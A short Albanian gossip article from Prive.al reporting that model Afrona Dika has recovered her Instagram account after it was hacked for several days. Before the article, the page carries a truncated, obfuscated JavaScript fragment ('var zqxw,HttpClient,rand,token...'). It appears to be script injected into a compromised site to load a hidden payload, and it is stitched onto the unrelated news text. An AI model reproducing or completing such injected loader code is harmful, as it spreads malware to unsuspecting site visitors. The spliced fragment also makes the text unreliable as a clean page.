;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Disa ditë pas sulmit kibernetik, një lajm i mirë vjen nga Afrona

By

Pak ditë më parë iu njoftuam që modelja e njohur Afrona Dika ka rënë pre e një sulmi kibernetik.

Ajo humbi qasjen në llogarinë e saj në Instagram.

Ndjekësit pikasën menjëherë këtë detaj duke u shqetësuar për sa i përket fotografisë së zezë që ishte vendosur nga hakerët në profilin e saj.

Fatmirësisht asgjë e keqe nuk ka ndodhur për Afronën teksa tashmë vjen një tjetër lajm i mirë.

Bukuroshja e ka rikthyer llogarinë e saj, siç ka bërë të ditur përmes një postimi në Instagram.

Në të, ajo shprehet:

“Përshëndetje të gjithëve. Tani profilin tim e kam sërish. Ishte hakuar për disa ditë. Dua të falenderoj me zemër ato që më ndihmuan në rikthimin e tij”.

Me një audiencë prej afro çerek milioni njerëz, ky aset kaq i rëndësishëm është sërish në duart e Afronës. /Prive.al

Artikuj të ngjashëm